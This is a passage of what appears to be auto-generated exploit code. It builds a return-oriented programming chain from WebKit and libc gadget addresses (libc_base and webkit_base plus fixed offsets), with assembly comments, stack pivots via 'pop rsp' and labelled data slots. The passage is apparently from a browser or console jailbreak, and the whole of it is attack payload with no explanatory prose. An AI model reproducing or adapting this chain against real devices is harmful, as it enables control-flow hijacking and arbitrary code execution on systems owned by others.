[rdi], rax libc_base+759608 //pop rax ]); //L5054: db([3, 0]); // 0x3 set_gadget(libc_base+763368,); //pop rcx //L5055: db([3, 0]); // 0x3 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+269088, //L5057 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5057: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+269144, //L5058 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5058: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+269280, //L5062 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+269264, //L5061 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5060: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L5061: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5062: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+269416, //L5065 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+269448, //L5067 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+269400, //L5064 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5064: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5065: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5066: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5067: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+269560, //L5068+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+269552, //L5068 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L5068: db([0, 0]); // 0x0 set_gadgets([ ropchain+269576, //L5068+24 ropchain+271584, //L5063 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+269616, //L5069 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L5069: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5070: db([32, 0]); // 0x20 set_gadget(libc_base+144605,); //pop rdi //L5071: db([32, 0]); // 0x20 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+269808, //L5075 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+269776, //L5073 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+269792, //L5074 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5072: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L5073: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5074: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5075: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+269864, //L5077 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L5077: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+269992, //L5079 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+270008, //L5080 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+269976, //L5078 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5078: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5079: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5080: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+270104, //L5082 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+270088, //L5081 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5081: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5082: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+270184, //L5083 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5083: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5085: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+270304, //L5088 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+270288, //L5086 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5086: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5088: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+270448, //L5091 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+270416, //L5089 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+270432, //L5090 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5089: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5090: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5091: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+270520, //L5093 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5093: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+270576, //L5094 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5094: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+270656, //L5096 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5096: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5098: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+270776, //L5101 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+270760, //L5099 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5099: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5101: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+270920, //L5104 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+270888, //L5102 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+270904, //L5103 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5102: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5103: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5104: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+271008, //L5106 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L5105: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L5106: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+271064, //L5107 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5107: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5109: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+271144, //L5111 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5111: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+271248, //L5112 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+271264, //L5113 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5112: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5113: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+271352, //L5115 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5115: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+271408, //L5116 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5116: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+271480, //L5119 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5119: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+271536, //L5120 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5120: db([0, 0]); // 0x0 set_gadgets([ webkit_base+1121481, //mov [rax], cl libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi //L5063: //L5040: //L4958: //L4869: libc_base+764760, //pop rsi ropchain+271624, //L5122 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5122: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5124: db([96, 0]); // 0x60 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+271744, //L5127 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+271728, //L5125 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5125: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5127: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+271920, //L5130 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+271936, //L5131 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+271888, //L5128 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+271904, //L5129 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5128: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5129: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5130: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5131: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+272032, //L5133 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+272016, //L5132 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5132: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5133: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+272112, //L5134 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5134: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5136: db([88, 0]); // 0x58 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+272232, //L5139 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+272216, //L5137 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5137: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5139: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+272408, //L5142 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+272424, //L5143 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+272376, //L5140 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+272392, //L5141 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5140: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5141: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5142: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5143: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+272520, //L5145 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+272504, //L5144 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5144: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5145: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+272600, //L5146 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5146: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5148: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+272720, //L5151 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+272704, //L5149 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5149: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5151: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+272864, //L5154 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+272832, //L5152 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+272848, //L5153 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5152: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5153: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5154: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+272944, //L5155 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5155: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5157: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+273064, //L5160 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+273048, //L5158 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5158: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5160: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+273208, //L5163 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+273176, //L5161 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+273192, //L5162 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5161: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5162: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5163: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+273288, //L5164 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5164: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5166: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+273408, //L5169 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+273392, //L5167 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5167: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5169: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+273552, //L5172 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+273520, //L5170 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+273536, //L5171 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5170: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5171: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5172: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+273632, //L5173 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5173: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5175: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+273752, //L5178 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+273736, //L5176 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5176: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5178: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+273896, //L5181 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+273864, //L5179 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+273880, //L5180 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5179: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5180: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5181: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+273976, //L5182 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5182: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5184: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+274096, //L5187 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+274080, //L5185 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5185: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5187: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+274240, //L5190 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+274208, //L5188 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+274224, //L5189 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5188: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5189: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5190: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+274320, //L5191 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5191: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5193: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+274440, //L5196 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+274424, //L5194 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5194: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5196: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+274584, //L5199 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+274552, //L5197 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+274568, //L5198 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5197: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5198: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5199: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608, //pop rax //L5201: ropchain+274688, //L5200 libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+782311, //pop rsp ropchain+192784, //__out_rev //L5200: libc_base+853989, //mov rax, rcx libc_base+764760 //pop rsi ]); db([4294967232, 4294967295]); // -0x40 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+274816, //L5202 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+274848, //L5204 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+274832, //L5203 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5202: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5203: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5204: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+274952, //L5205 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+274968, //L5206 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L5205: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5206: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+275088, //L5207 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+275072, //L5208 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L5208: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L5207: db([0, 0]); // 0x0 set_gadgets([ libc_base+764760, //pop rsi ropchain+275176, //L5210 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+275160, //L5209 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5209: db([0, 